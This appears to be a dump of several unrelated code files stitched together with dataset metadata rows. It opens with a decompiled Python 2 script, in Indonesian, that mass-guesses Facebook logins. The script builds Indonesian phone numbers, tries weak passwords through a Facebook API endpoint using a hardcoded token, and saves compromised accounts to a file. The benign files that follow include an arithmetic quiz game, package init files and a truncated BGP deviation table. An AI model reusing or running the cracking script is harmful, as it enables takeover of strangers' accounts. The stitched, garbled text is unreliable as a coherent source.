jalan(' \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88')
jalan('MASUKIN PASSWORD NYA')
jalan('CREATED BY TEGAR ID')
jalan('===================================')
CorrectPasscode = 'tegarid'
loop = 'true'
while loop == 'true':
passcode = raw_input('[?] PASSWORD : ')
if passcode == CorrectPasscode:
print '\n CORRECT\n '
loop = 'false'
else:
print 'WRONG'
os.system('xdg-open https://www.youtube.com/channel/UCtw4FMEyTYYll2RyQl6y28w')
def lisensi():
login()
def login():
print '[1] Mulai cloning ( tanpa login )'
time.sleep(0.05)
print '[0] Keluar'
pilih_login()
def pilih_login():
peak = raw_input('\nPILIH : ')
if peak == '':
print '[!] Isi Yang Bener Cuk'
pilih_login()
elif peak == '1':
Zeek()
def Zeek():
print 'Pilih Lagi Biar Pasti'
print '[1] Mulai Cracking'
time.sleep(0.05)
print '[0] Kembali'
time.sleep(0.05)
action()
def action():
global cpb
global oks
peak = raw_input('\nPILIH : ')
if peak == '':
print '[!] Isi Yang Bener Cuk'
action()
elif peak == '1':
os.system('clear')
print logo
print 'Masukin Kode Kartu Indonesia Misal (Tri = 95)' + '\n'
print 'Kode Kartu Yg Tersedia : 12,21,95,96,97,,56,57,58'
try:
c = raw_input('PILIH : ')
k = '+62'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Tidak Ditemukan'
raw_input('\n[ Kembali ]')
blackmafiax()
elif peak == '0':
login()
else:
print '[!] Isi Yang Bener Cuk'
action()
print 50 * '='
xxx = str(len(id))
jalan(' Total id Ditemukan : ' + xxx)
jalan(' Code yang lu pilih : ' + c)
jalan(' Tunggu Lagi Mulai Proses Cracking...')
jalan(' Untuk Stop Nya Tekan Ctrl+z')
print 50 * '='
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\xe2\x94\x82 [Berhasil] ' + k + c + user + ' ' + pass1 + ' \xe2\x94\x82'
okb = open('save/cloned.txt', 'a')
okb.write(k + c + user + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\xe2\x94\x82 [Cekpoint] ' + k + c + user + ' | ' + pass1 + ' \xe2\x94\x82'
cps = open('save/cloned.txt', 'a')
cps.write(k + c + user + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = 'sayang'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\xe2\x94\x82 [Berhasil] ' + k + c + user + ' | ' + pass2 + ' \xe2\x94\x82'
okb = open('save/cloned.txt', 'a')
okb.write(k + c + user + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\xe2\x94\x82 [Cekpoint] ' + k + c + user + ' | ' + pass2 + ' \xe2\x94\x82'
cps = open('save/cloned.txt', 'a')
cps.write(k + c + user + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '='
print 'Proses Cracking Sudah Selesai ...'
print 'Total Berhasil/Cekpoint : ' + str(len(oks)) + '/' + str(len(cpb))
print 'Hasil Crack Di Simpan di : save/cloned.txt'
jalan('Catatan : Akun Yang Kena Cp Tunggu Aja 10 Sampe 20 Hari Biar Pulih Lagi')
print ''
raw_input('\nKembali')
login()
if __name__ == '__main__':
login()
# okay decompiling patched.pyc
| 56.888
| 2,007
| 0.641471
| 2,630
| 14,222
| 3.453612
| 0.138783
| 0.346802
| 0.199163
| 0.26423
| 0.709017
| 0.703622
| 0.686007
| 0.672905
| 0.660685
| 0.656061
| 0
| 0.257692
| 0.147588
| 14,222
| 249
| 2,008
| 57.116466
| 0.491545
| 0.022008
| 0
| 0.305825
| 0
| 0.116505
| 0.65712
| 0.513276
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.11165
| 0.043689
| null | null | 0.135922
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 12
|
d93de5a9d4c4667841246e036fdb3d427311e6f4
| 153
|
py
|
Python
|
src/configflow/exceptions/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 8
|
2022-01-25T09:06:34.000Z
|
2022-03-28T14:55:45.000Z
|
src/configflow/exceptions/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 23
|
2022-01-23T15:15:00.000Z
|
2022-03-28T21:47:15.000Z
|
src/configflow/exceptions/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 1
|
2022-03-15T21:08:19.000Z
|
2022-03-15T21:08:19.000Z
|
"""Package for the exceptions."""
from configflow.exceptions import io
from configflow.exceptions import misc
from configflow.exceptions import sources
| 25.5
| 41
| 0.823529
| 19
| 153
| 6.631579
| 0.526316
| 0.333333
| 0.571429
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 153
| 5
| 42
| 30.6
| 0.926471
| 0.176471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d9441c37de378d1d7fbce4db995fcac8d52dad63
| 242
|
py
|
Python
|
hermes/forms/tasks.py
|
NiekKeijzer/hermes
|
48c2e015ab5b299dbbc488a8934af76cabf144cb
|
[
"MIT"
] | null | null | null |
hermes/forms/tasks.py
|
NiekKeijzer/hermes
|
48c2e015ab5b299dbbc488a8934af76cabf144cb
|
[
"MIT"
] | null | null | null |
hermes/forms/tasks.py
|
NiekKeijzer/hermes
|
48c2e015ab5b299dbbc488a8934af76cabf144cb
|
[
"MIT"
] | null | null | null |
from hermes.forms.models import Submission
from .signals import submission_received
def dispatch_submission_received(submission: Submission) -> None:
submission_received.send_robust(dispatch_submission_received, submission=submission)
| 30.25
| 88
| 0.85124
| 27
| 242
| 7.37037
| 0.481481
| 0.361809
| 0.261307
| 0.361809
| 0.462312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 242
| 7
| 89
| 34.571429
| 0.904545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d949505c7f3d2515f4ac98c37564e531c21eb3bb
| 21,319
|
py
|
Python
|
Funcoes.py
|
Wesley-Breno/Calculator
|
3f2c254177d5db155bdfeb32c5ef620523a94eb2
|
[
"MIT"
] | 3
|
2021-06-25T04:06:14.000Z
|
2021-07-29T20:05:09.000Z
|
Funcoes.py
|
Wesley-Breno/Calculator
|
3f2c254177d5db155bdfeb32c5ef620523a94eb2
|
[
"MIT"
] | null | null | null |
Funcoes.py
|
Wesley-Breno/Calculator
|
3f2c254177d5db155bdfeb32c5ef620523a94eb2
|
[
"MIT"
] | null | null | null |
from random import randint
def titulo_inicial():
"""
Ira escrever o titulo do jogo... "Calculator".
:return: None
"""
print()
print('\033[;1m⟶-⟷-⟵' * 10)
print(f'{"Calculator":^50}')
print('⟶-⟷-⟵' * 10)
print('\033[m')
def pular(c=1):
"""
Serve para pular linhas.
:param c:
Escolha quantas linhas a funcão vai pular.
:return: None
"""
cont = 0
while cont != c:
print()
cont += 1
def press_enter(c=0, msg='continuar'):
"""
Aparece uma mensagem para o usuario apertar Enter
para continuar a execuçao do programa.
:param c:
Serve para escolher a cor que a palavra Enter estara...
c = 0
Deixa em negrito
c = 1
Deixa em vermelho+negrito
c = 2
Deixa em roxo+negrito
c = 3
Deixa em azul+negrito
:param msg:
Serve para deixar o 'continuar' ou outra palavra.
Ex:
Digite Enter para continuar/sair.
:return: None
"""
if c == 0:
# Negrito
print()
print('__' * 16)
input(f'Pressione \033[;1mEnter\033[m para {msg}.')
elif c == 1:
# Vermelho
print()
print('__' * 16)
input(f'Pressione \033[1;31mEnter\033[m para {msg}.')
elif c == 2:
# Roxo
print()
print('__' * 16)
input(f'Pressione \033[35;1mEnter\033[m para {msg}.')
elif c == 3:
# Azul
print()
print('__' * 16)
input(f'Pressione \033[34;1mEnter\033[m para {msg}.')
def erro(msg='padrao'):
"""
Vai aparecer uma mensagem de erro na tela.
:param msg:
Mensagem personalizada... para caso seja um
erro em especifico.
:return: None
"""
if msg != 'padrao':
pular(3)
print('__' * 16)
print(f'[\033[1;31mERROR\033[m]\n{msg}')
press_enter(c=1)
else:
pular(3)
print('__' * 16)
print('[\033[1;31mERROR\033[m]\nParece que houve um erro\nTente novamente.')
press_enter(c=1)
def calculo(simbolo_matematico, dificuldade):
"""
Vai mostrar o calculo conforme sua dificuldade
e simbolo matematico.
:param simbolo_matematico:
Serve para escolher o simbolo matematico
EX:
1 -> Soma
2 -> Subtracao
3 -> Divisao
4 -> Multiplicacao
:param dificuldade:
Serve para escolher a dificuldade
EX:
1 -> Facil (de 1 a 100)
2 -> Normal (de 20 a 150)
3 -> Dificil (de 100 a 500)
4 -> Desafie-me (de 1000 a 3000)
:return: None
"""
if simbolo_matematico == 1: # Se for soma
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1, 100) # Dificuldade facil vai de 1 a 100
n2 = randint(1, 100)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150) # Dificuldade normal vai de 20 a 150
n2 = randint(20, 150)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500) # Dificuldade dificil vai de 100 a 500
n2 = randint(100, 500)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000) # Dificuldade desafie-me vai de 1000 a 3000
n2 = randint(1000, 3000)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif simbolo_matematico == 2: # Se for subtracao
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1, 100) # Dificuldade facil vai de 1 a 100
n2 = randint(1, 100)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150)
n2 = randint(20, 150)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500)
n2 = randint(100, 500)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000)
n2 = randint(1000, 3000)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif simbolo_matematico == 3: # Se for multiplicacao
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1, 100)
n2 = randint(1, 100)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150)
n2 = randint(20, 150)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500)
n2 = randint(100, 500)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000)
n2 = randint(1000, 3000)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif simbolo_matematico == 4: # Se for divisao
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(2, 100)
n2 = randint(2, 100)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150)
n2 = randint(2, 150)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(
f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500)
n2 = randint(2, 500)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(
f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000)
n2 = randint(2, 3000)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(
f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
| 40.919386
| 116
| 0.393874
| 2,255
| 21,319
| 3.702439
| 0.066075
| 0.049347
| 0.040244
| 0.057492
| 0.84573
| 0.826925
| 0.825009
| 0.805126
| 0.805126
| 0.805126
| 0
| 0.137783
| 0.48492
| 21,319
| 520
| 117
| 40.998077
| 0.621983
| 0.07491
| 0
| 0.922727
| 0
| 0.036364
| 0.266098
| 0.053199
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011364
| false
| 0
| 0.002273
| 0
| 0.013636
| 0.295455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9504bf6bd55f14bbf36d7503f8289596841f780
| 108
|
py
|
Python
|
packages/watchmen-meta/src/watchmen_meta/analysis/__init__.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-meta/src/watchmen_meta/analysis/__init__.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-meta/src/watchmen_meta/analysis/__init__.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from .pipeline_index_service import PipelineIndexService
from .topic_index_service import TopicIndexService
| 36
| 56
| 0.907407
| 12
| 108
| 7.833333
| 0.666667
| 0.255319
| 0.382979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 57
| 54
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d993e6829d30bcdd16990a42ad2fcd53d118ea63
| 60,066
|
py
|
Python
|
cisco-ios-xr/ydk/models/_deviate/_cisco_xr_openconfig_bgp_deviations.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/_deviate/_cisco_xr_openconfig_bgp_deviations.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/_deviate/_cisco_xr_openconfig_bgp_deviations.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.providers._importer import _yang_ns
_deviation_table = {
'Bgp.Global_.AfiSafis.AfiSafi.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.GracefulRestart.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.GracefulRestart.State.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
